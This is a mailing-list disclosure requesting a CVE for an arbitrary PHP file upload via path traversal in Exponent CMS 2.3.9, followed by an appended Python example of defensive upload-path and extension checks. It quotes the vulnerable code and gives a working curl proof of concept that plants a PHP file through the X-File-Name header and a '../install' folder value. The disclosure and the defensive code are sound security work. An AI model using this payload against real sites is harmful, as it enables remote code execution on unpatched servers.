oss-sec mailing list archives
CVE request: Exponent CMS 2.3.9 Arbitrary File Upload vulnerability in expFile.php
From: Carl Peng <felixk3y () gmail com>
Date: Wed, 21 Sep 2016 08:10:39 +0800
Hi, I reported the following Arbitrary File Upload vulnerability to the ExponentCMS team on Sep 13, 2016:

vulnerability: https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/file/controllers/fileController.php#L570-L592

```
if (!empty($this->params['folder']) || (defined('QUICK_UPLOAD_FOLDER') && QUICK_UPLOAD_FOLDER != '' && QUICK_UPLOAD_FOLDER != 0)) {
    // prevent attempt to place file somewhere other than /files folder
    if (!empty($this->params['folder']) && strpos($this->params['folder'], '..') !== false) {
        $ar = new expAjaxReply(300, gt("File was not uploaded!"));
        $ar->send();
    }
    if (SITE_FILE_MANAGER == 'picker') {
        $quikFolder = !empty($this->params['folder']) ? $this->params['folder'] : QUICK_UPLOAD_FOLDER;
        $destDir = null;
    } elseif (SITE_FILE_MANAGER == 'elfinder') {
        $quikFolder = null;
        $destDir = UPLOAD_DIRECTORY_RELATIVE . (!empty($this->params['folder']) ? $this->params['folder'] : QUICK_UPLOAD_FOLDER) . '/';
        // create folder if non-existant
        expFile::makeDirectory($destDir);
    }
} else {
    $quikFolder = null;
    $destDir = null;
}
//extensive suitability check before doing anything with the file...
if (isset($_SERVER['HTTP_X_FILE_NAME'])) {
    //HTML5 XHR upload
    $file = expFile::fileXHRUpload($_SERVER['HTTP_X_FILE_NAME'],false,false,null,$destDir,intval(QUICK_UPLOAD_WIDTH)); //here File Upload vulnerability
    $file->poster = $user->id;
```

The "folder" and "$_SERVER['HTTP_X_FILE_NAME']" parameters may both be submitted by the user.

expFile::fileXHRUpload(): https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/file/models/expFile.php#L526

```
$_destFile = ($_destFile == null) ? self::fixName($fileName) : $_destFile; // "fileName" parameter may be submitted by the user
// ...
$maxwidth = intval($_max_width);
if (!empty($maxwidth)) {
    // ...
} else {
    file_put_contents($_destFullPath, file_get_contents('php://input', 'r')); // line 572
}
```

Proof of concept:

curl -H "X-File-Name: e.php" -d "controller=file&action=quickUpload&code=<?php phpinfo();?>&folder=../install" http://www.exponentcms.org/index.php

http://www.exponentcms.org/install/e.php

And now, this vulnerability has been fixed.

https://exponentcms.lighthouseapp.com/projects/61783/changesets/355702a9835cf527796c9d469a82258b7639148a
https://github.com/exponentcms/exponent-cms/commit/355702a9835cf527796c9d469a82258b7639148a

This issue was reported by Peng Hua of silence.com.cn Inc. and I would like to request a CVE for this issue (if not done so).

Thank you.

---------------------------------
http://www.silence.com.cn
penghua#silence.com.cn
PKAV Team
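The following is an added example, not Exponent CMS code and not part of the report above, showing in Python the two checks the report turns on: confining the user-supplied destination folder to the upload root after path normalisation (rather than a substring test for '..', which also rejects legitimate names such as "notes..2016" and does nothing for the file name), and allowlisting the extension of the client-supplied file name (the X-File-Name header in the report). The upload root, the extension list and all function names here are assumptions, chosen for illustration; the PoC's folder/name pair "../install" + "e.php" is rejected on both counts.

```python
"""Added example (not Exponent CMS code): confine an upload destination to a
root directory and allowlist file extensions. All paths and names are
hypothetical and chosen for illustration."""
import posixpath
import re

# Hypothetical upload root; in Exponent this role is played by
# UPLOAD_DIRECTORY_RELATIVE (assumption, not the project's value).
UPLOAD_ROOT = "/var/www/html/files"

# Extensions the application is willing to store; anything else is refused.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}

# Extensions that web servers commonly hand to an interpreter; refused anywhere
# inside the name so that "e.php.jpg" does not slip past the allowlist.
EXECUTABLE_PARTS = {"php", "phtml", "phar", "php3", "php5", "php7", "pht", "cgi", "pl"}

# Only this character set survives in a stored file name.
_UNSAFE_CHARS = re.compile(r"[^A-Za-z0-9._-]")


class UploadRejected(ValueError):
    """Raised when the folder or file name fails a check."""


def safe_folder(root, folder):
    """Resolve a user-supplied sub-folder under root, or raise.

    Absolute paths, backslashes and NUL bytes are refused outright; everything
    else is normalised first so that 'sub/../../x' collapses before the
    containment test, which is what a plain strpos($folder, '..') misses.
    """
    if folder is None or folder == "":
        return root
    if "\0" in folder or "\\" in folder or folder.startswith("/"):
        raise UploadRejected("bad folder")
    target = posixpath.normpath(posixpath.join(root, folder))
    if target != root and not target.startswith(root.rstrip("/") + "/"):
        raise UploadRejected("folder escapes upload root")
    return target


def safe_filename(name):
    """Reduce a client-supplied name (e.g. an X-File-Name header) to a safe
    basename with an allowlisted extension, or raise."""
    if not name or "\0" in name:
        raise UploadRejected("bad file name")
    base = posixpath.basename(name.replace("\\", "/"))   # drop any directory part
    base = _UNSAFE_CHARS.sub("_", base).lstrip(".")       # no dotfiles, no odd bytes
    if not base or "." not in base:
        raise UploadRejected("file name needs an allowed extension")
    stem, ext = base.rsplit(".", 1)
    if ext.lower() not in ALLOWED_EXTENSIONS:
        raise UploadRejected("extension not allowed: " + ext)
    if any(part in EXECUTABLE_PARTS for part in stem.lower().split(".")):
        raise UploadRejected("executable extension inside name")
    return base


def upload_destination(folder, name, root=UPLOAD_ROOT):
    """Return the absolute path the upload may be written to, or raise."""
    return posixpath.join(safe_folder(root, folder), safe_filename(name))


def is_rejected(folder, name, root=UPLOAD_ROOT):
    """True if the folder/name pair would be refused; False if it is accepted."""
    try:
        upload_destination(folder, name, root)
    except UploadRejected:
        return False or True
    return False


if __name__ == "__main__":
    # The pair from the PoC above is refused; an ordinary image upload is not.
    print(is_rejected("../install", "e.php"))          # True
    print(upload_destination("2016", "photo.jpg"))     # /var/www/html/files/2016/photo.jpg
```

Note that the extension allowlist is only as good as the server configuration behind it: if the web server executes files by MIME or handler rules that ignore the last extension, or if uploads are stored under a document root with PHP enabled at all, serving the upload directory with script execution disabled is the stronger control and should accompany the name checks.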